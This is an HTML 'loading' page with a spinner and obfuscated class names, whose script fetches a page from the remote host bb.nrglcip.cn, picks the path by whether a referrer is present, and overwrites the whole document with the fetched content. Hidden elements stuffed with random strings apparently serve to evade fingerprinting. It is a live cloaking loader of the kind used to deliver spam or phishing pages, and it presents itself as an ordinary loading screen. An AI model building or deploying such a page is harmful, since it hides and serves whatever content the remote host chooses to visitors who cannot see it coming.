<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qckI66udr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qckI66udr .lZmMIKe {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qckI66udr .content {
            line-height: 50px;
            text-align: center
        }

        .qckI66udr .img {
            width: 100%
        }

        .qckI66udr .QQQGtBt {
            text-align: center
        }

        .qckI66udr .QQQGtBt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qckI66udr .QQQGtBt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qckI66udr .QQQGtBt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qckI66udr .QQQGtBt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qckI66udr .QQQGtBt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qckI66udr .QQQGtBt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qckI66udr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ay3jGe5sKsyG7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var PWBWIlj = ay3jGe5sKsyG7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ PWBWIlj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ PWBWIlj +".html?a=share";
		}
		
        C3i9l9lc8=url+"#"+new Date().getTime();
        C3i9l9lc8 && function() {
            $.get(C3i9l9lc8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>jd5W0li99uPEQSBk06eYi0beyqRBG12SFWWeGGizlFloJ</p>
<a  href='#' style='display:none'>M07dFZTEqcaiEcBwn1rTErpnCQVCf5FGQmcdCTPCJkhmm4YBemnb01</a>
<ul style='display:none' >HjMK29zSx8rV</ul><div class="qckI66udr">
    <div class="lZmMIKe">
        <div class="QQQGtBt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >iHorofADqP3DPMbeRFxNlXxjIG6HdI5x9f</ul>
<ul style='display:none' >iHorofADqP3DPMbeRFxNlXxjIG6HdI5x9f</ul>
<span style='display:none'>DpUIkgPH2tdtrdNA8QU4hTrAPkp9hj9SZymt5t2GdmFLavILAbC4fuh0Fj2c</span>
<img  src='' style='display:none'>
<div style='display:none'>ZNbel2mExDBgx2lEFttQ7kTc9QoNSrmIeSWH5pVu8lAlbJ5t39CHia7EjBNNqbd3rn9dgxdRUjddjPtEqjfcU76T9</div></body>
</html>